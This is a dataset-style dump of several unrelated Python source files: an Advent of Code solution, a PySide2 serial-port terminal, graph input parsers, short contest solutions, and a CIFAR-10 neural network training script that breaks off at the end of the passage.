seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
7272651469 | def main(filename):
part_one(filename)
part_two(filename)
def part_one(filename):
"""Starting with a frequency of zero, what is the resulting frequency after all of the
changes in frequency have been applied
"""
with open(filename, "r") as f:
print(sum([int(num) for num in f.readlines()]))
def part_two(filename):
"""You notice that the device repeats the same frequency change list over and over.
To calibrate the device, you need to find the first frequency it reaches twice.
Note that your device might need to repeat its list of frequency changes many times
before a duplicate frequency is found, and that duplicates might be found while in
the middle of processing the list.
"""
curr_freq = 0
visited_freqs = {curr_freq}
with open(filename, "r") as f:
nums = [int(num) for num in f.readlines()]
while True:
for num in nums:
curr_freq += num
if curr_freq in visited_freqs:
print(curr_freq)
return
visited_freqs.add(curr_freq)
if __name__ == "__main__":
main("input.txt")
| jonabantao/advent_of_code | 2018/day01/day1.py | day1.py | py | 1,179 | python | en | code | 0 | github-code | 90 |
16849667560 | import sys
from enum import Enum
import serial
import serial.tools.list_ports
from serial.threaded import ReaderThread, Protocol
from PySide2.QtGui import QPalette
from PySide2.QtCore import Qt, QObject, Slot, Signal
from PySide2.QtWidgets import QApplication, qApp, QWidget
from PySide2.QtWidgets import QPushButton, QComboBox, QGridLayout, QDialog, QPlainTextEdit, QStatusBar
from PySide2.QtWidgets import QTabWidget, QDialogButtonBox, QVBoxLayout, QLineEdit, QFormLayout
import re
g_key_map = {
Qt.Key_Left: 0x25,
Qt.Key_Up: 0x26,
Qt.Key_Right: 0x27,
Qt.Key_Down: 0x28,
Qt.Key_Backspace: 0x08,
Qt.Key_Tab: 0x09,
Qt.Key_Enter: 0x0D,
Qt.Key_Shift: 0x10,
Qt.Key_Control: 0x11,
Qt.Key_Alt: 0x12,
Qt.Key_Space: 0x20,
Qt.Key_Insert: 0x2D,
Qt.Key_Delete: 0x2E
}
_ANSI2HTML_STYLES = {}
ANSI2HTML_CODES_RE = re.compile('(?:\033\\[(\d+(?:;\d+)*)?([cnRhlABCDfsurgKJipm]))')
ANSI2HTML_PALETTE = {
# See http://ethanschoonover.com/solarized
'solarized': ['#073642', '#D30102', '#859900', '#B58900', '#268BD2', '#D33682', '#2AA198', '#EEE8D5', '#002B36', '#CB4B16', '#586E75', '#657B83', '#839496', '#6C71C4', '#93A1A1', '#FDF6E3'],
# Above mapped onto the xterm 256 color palette
'solarized-xterm': ['#262626', '#AF0000', '#5F8700', '#AF8700', '#0087FF', '#AF005F', '#00AFAF', '#E4E4E4', '#1C1C1C', '#D75F00', '#585858', '#626262', '#808080', '#5F5FAF', '#8A8A8A', '#FFFFD7'],
# Gnome default:
'tango': ['#000000', '#CC0000', '#4E9A06', '#C4A000', '#3465A4', '#75507B', '#06989A', '#D3D7CF', '#555753', '#EF2929', '#8AE234', '#FCE94F', '#729FCF', '#AD7FA8', '#34E2E2', '#EEEEEC'],
# xterm:
'xterm': ['#000000', '#CD0000', '#00CD00', '#CDCD00', '#0000EE', '#CD00CD', '#00CDCD', '#E5E5E5', '#7F7F7F', '#FF0000', '#00FF00', '#FFFF00', '#5C5CFF', '#FF00FF', '#00FFFF', '#FFFFFF'],
'console': ['#000000', '#AA0000', '#00AA00', '#AA5500', '#0000AA', '#AA00AA', '#00AAAA', '#AAAAAA', '#555555', '#FF5555', '#55FF55', '#FFFF55', '#5555FF', '#FF55FF', '#55FFFF', '#FFFFFF'],
}
def _ansi2html_get_styles(palette):
if palette not in _ANSI2HTML_STYLES:
p = ANSI2HTML_PALETTE.get(palette, ANSI2HTML_PALETTE['console'])
regular_style = {
'1': '', # bold
'2': 'opacity:0.5',
'4': 'text-decoration:underline',
'5': 'font-weight:bold',
'7': '',
'8': 'display:none',
}
bold_style = regular_style.copy()
for i in range(8):
regular_style['3%s' % i] = 'color:%s' % p[i]
regular_style['4%s' % i] = 'background-color:%s' % p[i]
bold_style['3%s' % i] = 'color:%s' % p[i + 8]
bold_style['4%s' % i] = 'background-color:%s' % p[i + 8]
# The default xterm 256 colour p:
indexed_style = {}
for i in range(16):
indexed_style['%s' % i] = p[i]
for rr in range(6):
for gg in range(6):
for bb in range(6):
i = 16 + rr * 36 + gg * 6 + bb
r = (rr * 40 + 55) if rr else 0
g = (gg * 40 + 55) if gg else 0
b = (bb * 40 + 55) if bb else 0
indexed_style['%s' % i] = ''.join('%02X' % c if 0 <= c <= 255 else None for c in (r, g, b))
for g in range(24):
i = g + 232
l = g * 10 + 8
indexed_style['%s' % i] = ''.join('%02X' % c if 0 <= c <= 255 else None for c in (l, l, l))
_ANSI2HTML_STYLES[palette] = (regular_style, bold_style, indexed_style)
return _ANSI2HTML_STYLES[palette]
def ansi2html(text, palette='solarized'):
def _ansi2html(m):
if m.group(2) != 'm':
return ''
state = None
sub = ''
cs = m.group(1)
cs = cs.strip() if cs else ''
for c in cs.split(';'):
c = c.strip().lstrip('0') or '0'
if c == '0':
while stack:
sub += '</span>'
stack.pop()
elif c in ('38', '48'):
extra = [c]
state = 'extra'
elif state == 'extra':
if c == '5':
state = 'idx'
elif c == '2':
state = 'r'
elif state:
if state == 'idx':
extra.append(c)
state = None
# 256 colors
color = indexed_style.get(c) # TODO: convert index to RGB!
if color is not None:
sub += '<span style="%s:%s">' % ('color' if extra[0] == '38' else 'background-color', color)
stack.append(extra)
elif state in ('r', 'g', 'b'):
extra.append(c)
if state == 'r':
state = 'g'
elif state == 'g':
state = 'b'
else:
state = None
try:
color = '#' + ''.join('%02X' % c if 0 <= c <= 255 else None for x in extra for c in [int(x)])
except (ValueError, TypeError):
pass
else:
sub += '<span style="%s:%s">' % ('color' if extra[0] == '38' else 'background-color', color)
stack.append(extra)
else:
if '1' in stack:
style = bold_style.get(c)
else:
style = regular_style.get(c)
if style is not None:
sub += '<span style="%s">' % style
stack.append(c) # Still needs to be added to the stack even if style is empty (so it can check '1' in stack above, for example)
return sub
stack = []
regular_style, bold_style, indexed_style = _ansi2html_get_styles(palette)
sub = ANSI2HTML_CODES_RE.sub(_ansi2html, text)
while stack:
sub += '</span>'
stack.pop()
return sub
class ConnectParam:
def __init__(self, type):
self.type = type
class SerialParam(ConnectParam):
def __init__(self, port, baud=115200):
ConnectParam.__init__(self, 'serial')
self.port = port
self.baud = baud
class ConnectType(Enum):
Serial = 1
Ssh = 2
class ComboBox(QComboBox):
clicked = Signal()
def __init__(self, parent=None):
QComboBox.__init__(self, parent)
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.clicked.emit()
super().mousePressEvent(event)
class Console(QPlainTextEdit):
key_data_signal = Signal(str)
def __init__(self, parent=None):
self.parent = parent
QPlainTextEdit.__init__(self, parent)
self.m_localEchoEnabled = False
self.document().setMaximumBlockCount(100)
p = QPalette()
p.setColor(QPalette.Base, Qt.black)
p.setColor(QPalette.Text, Qt.green)
self.setPalette(p)
def putData(self, data):
# d = ansi2html(data)
# self.appendHtml(data)
if data == '\r':
return
self.insertPlainText(data)
bar = self.verticalScrollBar()
bar.setValue(bar.maximum())
def setLocalEchoEnabled(self, bool_value):
self.m_localEchoEnabled = bool_value
def keyPressEvent(self, e):
# if key == Qt.Key_Backspace or key == Qt.Key_Left or key == Qt.Key_Right or key == Qt.Key_Up or key == Qt.Key_Down:
# return
if self.m_localEchoEnabled:
QPlainTextEdit.keyPressEvent(e)
# key = e.text()
if self.parent.alive:
if e.text():
print('key: ', e.text)
self.key_data_signal.emit(e.text())
elif e.key() in g_key_map:
print('key: 0x%x' % g_key_map[e.key()])
self.key_data_signal.emit(chr(g_key_map[e.key()]))
def mousePressEvent(self, e):
self.setFocus()
# def mouseDoubleClickEvent(self, e):
# pass
# def contextMenuEvent(self, e):
# pass
class SerialProtocol(Protocol, QObject):
ENCODING = 'utf-8'
UNICODE_HANDLING = 'replace'
connected_signal = Signal()
connect_losed_signal = Signal()
ingoing_data_signal = Signal(str)
def __init__(self):
QObject.__init__(self)
self.transport = None
def bind_signals(self, parent):
self.connected_signal.connect(parent.connected)
self.connect_losed_signal.connect(parent.connect_losed)
self.ingoing_data_signal.connect(parent.ingoing_data)
self.connected_signal.emit()
def connection_made(self, transport):
"""Store transport"""
self.transport = transport
def data_received(self, data):
"""Buffer received data, find TERMINATOR, call handle_packet"""
d = data.decode(self.ENCODING, self.UNICODE_HANDLING)
sys.stdout.write('line received: {!r}\n'.format(d))
self.ingoing_data_signal.emit(d)
def connection_lost(self, exc):
if exc:
print(exc)
sys.stdout.write('port closed\n')
self.transport = None
self.connect_losed_signal.emit()
def write_packet(self, data, is_binary):
if self.transport:
if is_binary:
self.transport.write(data)
else:
self.transport.write(data.encode(self.ENCODING, self.UNICODE_HANDLING))
class SerialWindow(QWidget):
def __init__(self, parent=None, port=None, baud=115200):
QWidget.__init__(self, parent)
self.alive = False
self.console = Console(self)
self.console.key_data_signal.connect(self.write_data)
self.status_bar = QStatusBar(self)
layout = QGridLayout(self)
layout.addWidget(self.console)
layout.addWidget(self.status_bar)
ser = serial.serial_for_url(port, baudrate=baud, timeout=1)
t = ReaderThread(ser, SerialProtocol)
t.start()
_, self.protocol = t.connect()
self.protocol.bind_signals(self)
def showStatusMessage(self, message):
self.status_bar.showMessage(message)
@Slot()
def connected(self):
self.showStatusMessage('opened')
self.alive = True
@Slot()
def connect_losed(self):
self.showStatusMessage('closed')
self.alive = False
@Slot(str)
def ingoing_data(self, data):
self.console.putData(data)
@Slot(str, int)
def write_data(self, data, is_binary=0):
self.protocol.write_packet(data, is_binary)
@Slot()
def handle_error(self, error):
self.showStatusMessage(error)
pass
class NewConnectDialog(QDialog):
new_connect_window_signal = Signal(ConnectParam)
def __init__(self, parent):
QDialog.__init__(self, parent)
self.parent = parent
self.setWindowTitle('新建窗口')
tabwidget = QTabWidget()
tabwidget.addTab(SerialConnectForm(self), '串口')
tabwidget.addTab(SshConnectForm(self), u'SSH')
layout = QVBoxLayout()
layout.addWidget(tabwidget)
self.setLayout(layout)
self.new_connect_window_signal.connect(parent.new_connect_window)
@Slot(ConnectParam)
def new_connect(self, param):
self.new_connect_window_signal.emit(param)
self.close_window()
@Slot()
def close_window(self):
self.close()
class BaseForm(QDialog):
def __init__(self, parent):
QDialog.__init__(self, parent)
self.main_layout = QVBoxLayout(self)
self.setModal(True)
def add_confirm_cancel_box(self):
cancel_btn = QPushButton('取消')
ok_btn = QPushButton('确定')
self.ok_cancel_box = QDialogButtonBox()
self.ok_cancel_box.addButton(ok_btn, QDialogButtonBox.AcceptRole)
self.ok_cancel_box.addButton(cancel_btn, QDialogButtonBox.RejectRole)
self.main_layout.addWidget(self.ok_cancel_box)
class SerialConnectForm(BaseForm):
ok_signal = Signal(SerialParam)
def __init__(self, parent):
BaseForm.__init__(self, parent)
self.setWindowTitle('串口设置')
self.serial_name_comb = ComboBox()
self.serial_name_comb.addItem('Please choose device')
self.serial_name_comb.setEditable(True)
# self.serial_name_comb.clicked.connect(self.list_ports)
self.serial_port_edit = QLineEdit()
self.serial_baud_edit = QLineEdit()
format_layout = QFormLayout()
format_layout.addRow('设备名:', self.serial_name_comb)
format_layout.addRow('端口:', self.serial_port_edit)
format_layout.addRow('波特率:', self.serial_baud_edit)
self.main_layout.addLayout(format_layout)
self.add_confirm_cancel_box()
self.ok_cancel_box.accepted.connect(self.ok)
self.ok_cancel_box.rejected.connect(parent.close_window)
self.ok_signal.connect(parent.new_connect)
self.list_ports()
print("Now there are {} Items".format(self.serial_name_comb.count()))
@Slot()
def ok(self):
print('accepted')
device = self.serial_name_comb.currentText()
serialParam = SerialParam(device)
self.ok_signal.emit(serialParam)
def __deinit__(self):
print('SerialConnectForm __deinit__')
def list_ports(self):
port_list = serial.tools.list_ports.comports()
if len(port_list):
self.serial_name_comb.clear()
for index, port in enumerate(port_list):
print(port.device)
self.serial_name_comb.addItem(port.device)
class SshConnectForm(BaseForm):
def __init__(self, parent=None):
BaseForm.__init__(self, parent)
self.setWindowTitle('SSH设置')
self.setFixedSize(600, 450)
self.host_edit = QLineEdit(self)
self.port_edit = QLineEdit(self)
self.user_edit = QLineEdit(self)
format_layout = QFormLayout()
format_layout.addRow('HOST:', self.host_edit)
format_layout.addRow('PORT:', self.port_edit)
format_layout.addRow('USER:', self.user_edit)
self.main_layout.addLayout(format_layout)
self.add_confirm_cancel_box()
class MainWindow(QWidget):
def __init__(self, parent=None):
QWidget.__init__(self, parent)
self.setWindowTitle('串口助手')
self.setFixedSize(800, 600)
self.tabwidget = QTabWidget(self)
new_connect_btn = QPushButton(text='新建连接', parent=self.tabwidget)
new_connect_btn.clicked.connect(self.new_connect_dialog)
self.tabwidget.addTab(new_connect_btn, '欢迎')
self.layout = QVBoxLayout()
self.layout.addWidget(self.tabwidget)
self.setLayout(self.layout)
desktop = qApp.desktop()
self.move((desktop.width() - self.width()) / 2, (desktop.height() - self.height()) / 2)
@Slot()
def new_connect_dialog(self):
dialog = NewConnectDialog(self)
dialog.setModal(True)
dialog.show()
@Slot(ConnectParam)
def new_connect_window(self, param: ConnectParam):
if param.type == 'serial':
serialWindow = SerialWindow(self, param.port, param.baud)
self.tabwidget.addTab(serialWindow, '串口')
self.tabwidget.setCurrentWidget(serialWindow)
app = QApplication()
mainWindow = MainWindow()
mainWindow.show()
sys.exit(app.exec_())
| imxood/imxood.github.io | src/program/python/app/serial_tool/app.py | app.py | py | 15,654 | python | en | code | 0 | github-code | 90 |
71273055977 | import re
def parse_vertex_and_square_ids(
data: str, start_string: str = "Square ID", end_string: str = "# Edges",
) -> dict:
"""Return a dictionary of vertex ID & square ID pairs.
This function will parse through the read-in input data between ''start_string'' and ''end_string''
to return the filtered text in-between.
This text is then converted to a dictionary mapping vertex IDs to square IDs.
:param data: read-in input file
:type data: str
:param start_string: starting string to search from, defaults to 'Square ID'
:type start_string: str
:param end_string: ending string to search until, defaults to '# Edges'
:type end_string: str
:return: a dictionary of vertex IDs & corresponding square IDs
:rtype: dict
"""
# split the data on the two strings
list_of_ids = data.split(start_string)[-1].split(end_string)[0]
# split the data on newline character
list_of_ids = list_of_ids.split("\n")
# remove empty strings that arose due to whitespace by using filter
list_of_ids = list(filter(lambda x: x != "", list_of_ids))
# create a dictionary of key-value pairs by splitting on the comma character
ids_map = {}
for i in list_of_ids:
splitted_string = i.split(",")
vertex_id = splitted_string[0]
square_id = int(splitted_string[1])
# create a mapping
ids_map[vertex_id] = square_id
return ids_map
def parse_edges_and_weights(
data: str, start_string: str = "Distance", end_string: str = "# Source",
) -> list:
"""Return a list of edges with weights.
This function will parse through the read-in input data between strings ''start_string'' and ''end_string''
to return the filtered text in-between.
This text is then converted to a list of sub-lists, where each sub-list is of the form:
[from_vertex, to_vertex, weight].
:param data: read-in input file
:type data: str
:param start_string: starting string to search from, defaults to 'Distance'
:type start_string: str
:param end_string: ending string to search until, defaults to '# Source'
:type end_string: str
:return: a list of lists of edges and weights
:rtype: list
"""
# split the data on the two strings
list_of_edges = data.split(start_string)[-1].split(end_string)[0]
# split the data on newline character
list_of_edges = list_of_edges.split("\n")
# remove empty strings that arose due to whitespace by using filter
list_of_edges = list(filter(lambda x: x != "", list_of_edges))
# create a list of lists of type [from, to, weight] by splitting on the comma character
list_of_lists_edges = []
for i in list_of_edges:
splitted_string = i.split(",")
# convert the splitted string elements to integer
sublist_of_edges = [int(i) for i in splitted_string]
# append the sublist to the major list
list_of_lists_edges.append(sublist_of_edges)
return list_of_lists_edges
def parse_src_and_dest(data: str) -> tuple:
"""Return source and destination vertices.
This function will parse the read-in input data looking for vertex numbers after characters
`S` for source and `D` for destination.
The parsed vertex numbers are then converted to integers and returned.
:param data: read-in input file
:type data: str
:return: source and destination vertices
:rtype: tuple
"""
# look for a sequence of digits the character S separated by newline
regex_source = re.compile("S,([0-9]*)\n")
# look for a sequence of digits after the character D separated by newline
regex_dest = re.compile("D,([0-9]*)\n")
# find the matches in data
src = int(regex_source.findall(data)[0])
dest = int(regex_dest.findall(data)[0])
return src, dest
def compute_square_coordinates(height: int = 10, width: int = 10) -> list:
"""Compute coordinates of the bottom right corner for each square on the 10x10 grid, where each square is of size 10x10.
This function will store the coordinate information of the bottom right corner of each square for subsequent use.
Indices in the resultant lists are equal to respective Square IDs.
:param height: height of the grid, defaults to 10
:type height: int
:param width: width of the grid, defaults to 10
:type width: int
:return: list of approximate square coordinates
:rtype: list
"""
square_coordinates = []
# initialize location of the top left corner of the grid (square 0)
loc_x, loc_y = 0, 0
# move down 10 times
for i in range(height):
loc_x = loc_x - 10
# move right 10 times
for j in range(width):
loc_y = loc_y + 10
square_coordinates.append((loc_x, loc_y))
return square_coordinates
| jeannadark/search_alchemy | constructor/input_reader.py | input_reader.py | py | 4,847 | python | en | code | 1 | github-code | 90 |
18404691999 | S = int(input())
YYMM = 0
MMYY = 0
if S % 100 >= 1 and S % 100 <= 12:
YYMM = 1
if S // 100 >= 1 and S // 100 <= 12:
MMYY = 1
if YYMM == 0 and MMYY == 0:
print('NA')
elif YYMM == 0 and MMYY == 1:
print('MMYY')
elif YYMM == 1 and MMYY == 0:
print('YYMM')
else:
print('AMBIGUOUS')
| Aasthaengg/IBMdataset | Python_codes/p03042/s889911714.py | s889911714.py | py | 306 | python | en | code | 0 | github-code | 90 |
18406265649 | import sys
sys.setrecursionlimit(10**8)
N = int(input())
graph = [[] for _ in range(N)]
for i in range(1, N):
u, v, w = map(int, input().split())
graph[u-1].append((v-1, w))
graph[v-1].append((u-1, w))
color = [0 for _ in range(N)]
visited = [False for _ in range(N)]
def dfs(now):
for adj in graph[now]:
v, dist = adj
if visited[v]:
continue
visited[v] = True
color[v] = color[now] + dist
dfs(v)
return
for start in range(N):
if not visited[start]:
color[start] = 0
visited[start] = True
dfs(start)
for i in range(N):
print(color[i] % 2)
| Aasthaengg/IBMdataset | Python_codes/p03044/s848594458.py | s848594458.py | py | 651 | python | en | code | 0 | github-code | 90 |
72660149416 | import numpy as np
from tensorflow.keras.datasets.cifar10 import load_data
from keras.utils.np_utils import to_categorical
import tensorflow as tf
def cifar10_load():
(x_train_n, y_train_n), (x_test, y_test) = load_data()
x_train = np.copy(x_train_n[:45000])
y_train = np.copy(y_train_n[:45000])
x_dev = np.copy(x_train_n[45000:])
y_dev = np.copy(y_train_n[45000:])
y_train = to_categorical(y_train)
y_dev = to_categorical(y_dev)
y_test = to_categorical(y_test)
return (x_train/255.0, y_train), (x_dev/255.0, y_dev), (x_test/255.0, y_test)
def initialize_uninitialized(sess):
global_vars = tf.global_variables()
is_not_initialized = sess.run([tf.is_variable_initialized(var) for var in global_vars])
not_initialized_vars = [v for (v, f) in zip(global_vars, is_not_initialized) if not f]
#print([str(i.name) for i in not_initialized_vars]) # only for testing
if len(not_initialized_vars):
sess.run(tf.variables_initializer(not_initialized_vars))
| HaojieYuan/RobustNN | Benchmark_detection/utils.py | utils.py | py | 1,016 | python | en | code | 0 | github-code | 90 |
41010176788 | from datetime import datetime
import matplotlib as mpl
mpl.use('Agg') # NOQA
from lasagnekit.easy import BatchOptimizer, BatchIterator, get_batch_slice
from lasagnekit.nnet.capsule import Capsule
from lasagnekit.easy import iterate_minibatches
from lasagne import updates
from lasagnekit.updates import santa_sss
updates.santa_sss = santa_sss # NOQA
import theano
import theano.tensor as T
import numpy as np
import json
from skimage.io import imsave
from lasagnekit.datasets.infinite_image_dataset import Transform
class MyBatchIterator(BatchIterator):
def __init__(self, nb_data_augmentation=1, **transform_params):
super(MyBatchIterator, self).__init__()
self.nb_data_augmentation = nb_data_augmentation
self.transform_params = transform_params
def transform(self, batch_index, V):
assert self.batch_size is not None
assert self.nb_batches is not None
if isinstance(batch_index, T.TensorVariable):
batch_slice = get_batch_slice(batch_index,
self.batch_size)
else:
batch_slice = slice(batch_index * self.batch_size,
(batch_index+1) * self.batch_size)
d = OrderedDict()
X = V["X"][batch_slice]
y = V["y"][batch_slice]
X_list = [X]
y_list = [y]
for i in range(self.nb_data_augmentation):
tr, _ = Transform(X.transpose(0, 2, 3, 1),
np.random,
**self.transform_params)
imsave("out.png", (((tr[0] + 1) / 2.)))
X_transformed = tr.transpose((0, 3, 1, 2))
X_list.append(X_transformed)
y_list.append(y)
d["X"] = np.concatenate(X_list, axis=0)
d["y"] = np.concatenate(y_list, axis=0)
d["X"], d["y"] = shuffle(d["X"], d["y"])
return d
if __name__ == "__main__":
from lasagnekit.datasets.cifar10 import Cifar10
from sklearn.utils import shuffle
from sklearn.cross_validation import train_test_split
from collections import OrderedDict
from hp_toolkit.hp import (
Param, make_constant_param,
instantiate_random, instantiate_default
)
import argparse
from models import vgg # NOQA
from models import vgg_small # NOQA
from models import vgg_very_small # NOQA
from models import spatially_sparse # NOQA
from models import nin # NOQA
from models import fully # NOQA
from models import residual # NOQA
from models import residualv2 # NOQA
from models import residualv3 # NOQA
from models import residualv4 # NOQA
from models import residualv5 # NOQA
from lightjob.cli import load_db
db = load_db()
job_content = {}
parser = argparse.ArgumentParser(description='zoo')
parser.add_argument("--budget-hours",
default=np.inf,
help="nb of maximum hours (defaut=inf)")
parser.add_argument("--fast-test", default=False, type=bool)
parser.add_argument("--model", default="vgg", type=str)
parser.add_argument("--default-model", default=False, type=bool)
models = {
"vgg": vgg,
"vgg_small": vgg_small,
"vgg_very_small": vgg_very_small,
"spatially_sparse": spatially_sparse,
"nin": nin,
"fully": fully,
"residual": residual,
"residualv2": residualv2,
"residualv3": residualv3,
"residualv4": residualv4,
"residualv5": residualv5
}
args = parser.parse_args()
model_class = models[args.model]
budget_sec = args.budget_hours * 3600
begin = datetime.now()
seed = np.random.randint(0, 1000000000)
np.random.seed(seed)
fast_test = args.fast_test
rng = np.random
if args.default_model is True:
instantiate = instantiate_default
else:
instantiate = instantiate_random
job = {}
data = Cifar10(batch_indexes=[1, 2, 3, 4, 5])
data.load()
data_test = Cifar10(batch_indexes=[6])
data_test.load()
job['dataset'] = data.__class__.__name__
hp = dict(
learning_rate=Param(initial=0.001, interval=[-4, -2], type='real', scale='log10'),
learning_rate_decay=Param(initial=0.05, interval=[0, 0.1], type='real'),
learning_rate_decay_method=Param(initial='discrete', interval=['exp', 'none', 'sqrt', 'lin', 'discrete'], type='choice'),
momentum=Param(initial=0.9, interval=[0.5, 0.99], type='real'),
weight_decay=make_constant_param(0.),
discrete_learning_rate_epsilon=make_constant_param(1e-4),#NEW TO ADD
discrete_learning_divide=make_constant_param(10.),
l2_decay=Param(initial=0, interval=[-8, -4], type='real', scale='log10'),#NEW TO ADD
max_epochs=make_constant_param(1000),
batch_size=Param(initial=32,
interval=[16, 32, 64, 128],
type='choice'),
patience_nb_epochs=make_constant_param(50),
valid_ratio=make_constant_param(0.15),
patience_threshold=make_constant_param(1),
patience_check_each=make_constant_param(1),
optimization=Param(initial='adam',
interval=['adam', 'nesterov_momentum', 'rmsprop'],
type='choice'),
# data augmentation
nb_data_augmentation=Param(initial=1, interval=[0, 1, 2, 3, 4], type='choice'),
zoom_range=make_constant_param((1, 1)),
rotation_range=make_constant_param((0, 0)),
shear_range=make_constant_param((1, 1)),
translation_range=make_constant_param((-5, 5)),
do_flip=make_constant_param(True)
)
if fast_test is True:
instantiate = instantiate_default
default_params = {}
if fast_test is True:
default_params["max_epochs"] = 1
hp = instantiate(hp, default_params=default_params)
job_content['hp'] = hp
hp_model = model_class.params
hp_model = instantiate(hp_model)
job_content['hp_model'] = hp_model
model = model_class.build_model(
input_width=data.img_dim[1],
input_height=data.img_dim[2],
output_dim=data.output_dim,
**hp_model)
job_content['model'] = model_class.__name__
print(model_class.__name__)
print(json.dumps(hp, indent=4))
print(json.dumps(hp_model, indent=4))
initial_lr = hp["learning_rate"]
def evaluate(X, y, batch_size=None):
if batch_size is None:
batch_size = hp["batch_size"]
y_pred = []
for mini_batch in iterate_minibatches(X.shape[0],
batch_size):
y_pred.extend((nnet.predict(X[mini_batch]) == y[mini_batch]).tolist())
return np.mean(y_pred)
class MyBatchOptimizer(BatchOptimizer):
def quitter(self, update_status):
quit = super(MyBatchOptimizer, self).quitter(update_status)
if (datetime.now() - begin).total_seconds() >= budget_sec:
print("Budget finished.quit.")
quit = True
return quit
def iter_update(self, epoch, nb_batches, iter_update_batch):
start = datetime.now()
status = super(MyBatchOptimizer, self).iter_update(epoch,
nb_batches,
iter_update_batch)
duration = (datetime.now() - start).total_seconds()
status["duration"] = duration
acc = evaluate(X_train, y_train, batch_size=self.batch_size_eval)
status["accuracy_train"] = acc
status["accuracy_train_std"] = 0
acc = evaluate(X_valid, y_valid, batch_size=self.batch_size_eval)
status["accuracy_valid"] = acc
status["accuracy_valid_std"] = 0
status["error_valid"] = 1 - status["accuracy_valid"]
status = self.add_moving_avg("accuracy_train", status)
status = self.add_moving_var("accuracy_train", status)
status = self.add_moving_avg("accuracy_valid", status)
status = self.add_moving_var("accuracy_valid", status)
for k, v in status.items():
if k not in job_content:
job_content[k] = [v]
else:
job_content[k].append(v)
lr = self.learning_rate
lr_decay_method = hp["learning_rate_decay_method"]
lr_decay = hp["learning_rate_decay"]
cur_lr = lr.get_value()
t = status["epoch"]
if lr_decay_method == "exp":
new_lr = cur_lr * (1 - lr_decay)
elif lr_decay_method == "lin":
new_lr = initial_lr / (1 + t)
elif lr_decay_method == "sqrt":
new_lr = initial_lr / np.sqrt(1 + t)
elif lr_decay_method == 'discrete':
eps = hp["discrete_learning_rate_epsilon"]
div = hp["discrete_learning_divide"]
if status["moving_var_accuracy_valid"] <= eps:
new_lr = cur_lr / div
else:
new_lr = cur_lr
else:
new_lr = cur_lr
new_lr = np.array(new_lr, dtype="float32")
lr.set_value(new_lr)
if 'learning_rate_per_epoch' not in job_content:
job_content['learning_rate_per_epoch'] = []
job_content['learning_rate_per_epoch'].append(float(self.learning_rate.get_value()))
return status
def add_moving_avg(self, name, status, B=0.9):
if len(self.stats) >= 2:
old_avg = self.stats[-2]["moving_avg_" + name]
else:
old_avg = 0
avg = B * old_avg + (1 - B) * status[name]
status["moving_avg_" + name] = avg
return status
def add_moving_var(self, name, status, B=0.9):
if len(self.stats) >= 2:
old_avg = self.stats[-2]["moving_avg_" + name]
old_var = self.stats[-2]["moving_var_" + name]
else:
old_avg = 0
old_var = 0
new_avg = B * old_avg + (1 - B) * status[name]
var = B * old_var + (1 - B) * (status[name] - old_avg) * (status[name] - new_avg)
status["moving_var_" + name] = var
return status
learning_rate = theano.shared(np.array(hp["learning_rate"],
dtype="float32"))
momentum = hp["momentum"]
optim_params = {"learning_rate": learning_rate}
if "momentum" in hp["optimization"]:
optim_params["momentum"] = hp["momentum"]
batch_optimizer = MyBatchOptimizer(
verbose=1, max_nb_epochs=hp["max_epochs"],
batch_size=hp["batch_size"],
optimization_procedure=(getattr(updates, hp["optimization"]),
optim_params),
patience_stat="error_valid",
patience_nb_epochs=hp["patience_nb_epochs"],
patience_progression_rate_threshold=hp["patience_threshold"],
patience_check_each=hp["patience_check_each"],
verbose_stat_show=[
"epoch",
"duration",
"accuracy_train",
"accuracy_train_std",
"accuracy_valid",
"accuracy_valid_std",
]
)
batch_size_eval = 1024
job_content['batch_size_eval'] = batch_size_eval
batch_optimizer.learning_rate = learning_rate
batch_optimizer.batch_size_eval = batch_size_eval
input_variables = OrderedDict()
input_variables["X"] = dict(tensor_type=T.tensor4)
input_variables["y"] = dict(tensor_type=T.ivector)
functions = dict(
predict=dict(
get_output=lambda model, X: (model.get_output(X, deterministic=True)[0]).argmax(axis=1),
params=["X"]
)
)
def loss_function(model, tensors):
X = tensors["X"]
y = tensors["y"]
y_hat, = model.get_output(X)
if hp["weight_decay"] > 0:
l1 = sum(T.abs_(param).sum() for param in model.capsule.all_params_regularizable) * hp["weight_decay"]
else:
l1 = 0
if hp["l2_decay"] > 0:
l2 = sum(T.sqr(param).sum() for param in model.capsule.all_params_regularizable) * hp["l2_decay"]
else:
l2 = 0
return T.nnet.categorical_crossentropy(y_hat, y).mean() + l1 + l2
batch_iterator = MyBatchIterator(hp["nb_data_augmentation"],
zoom_range=hp["zoom_range"],
rotation_range=hp["rotation_range"],
shear_range=hp["shear_range"],
translation_range=hp["translation_range"],
do_flip=hp["do_flip"])
nnet = Capsule(
input_variables, model,
loss_function,
functions=functions,
batch_optimizer=batch_optimizer,
batch_iterator=batch_iterator,
)
from sklearn.preprocessing import LabelEncoder
imshape = ([data.X.shape[0]] +
list(data.img_dim))
X = data.X.reshape(imshape).astype(np.float32)
y = data.y
label_encoder = LabelEncoder()
y = label_encoder.fit_transform(y)
y = y.astype(np.int32)
X, y = shuffle(X, y)
if fast_test is True:
X = X[0:100]
y = y[0:100]
X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=hp["valid_ratio"])
# rescaling to [-1, 1]
X_min = X_train.min(axis=(0, 2, 3))[None, :, None, None]
X_max = X_train.max(axis=(0, 2, 3))[None, :, None, None]
def preprocess(a):
return (a / 255.) * 2 - 1
X_train = preprocess(X_train)
X_valid = preprocess(X_valid)
job_content['nb_examples_train'] = X_train.shape[0]
job_content['nb_examples_valid'] = X_valid.shape[0]
try:
nnet.fit(X=X_train, y=y_train)
except KeyboardInterrupt:
print("interruption...")
imshape = ([data_test.X.shape[0]] +
list(data_test.img_dim))
X_test = data_test.X.reshape(imshape).astype(np.float32)
X_test = preprocess(X_test)
y_test = data_test.y
y_test = label_encoder.transform(y_test)
y_test = y_test.astype(np.int32)
acc = evaluate(X_test, y_test, batch_size_eval)
job_content['accuracy_test'] = acc
job_content['accuracy_test_std'] = 0
print("Test accuracy : {}+-{}".format(acc, 0))
if fast_test is False:
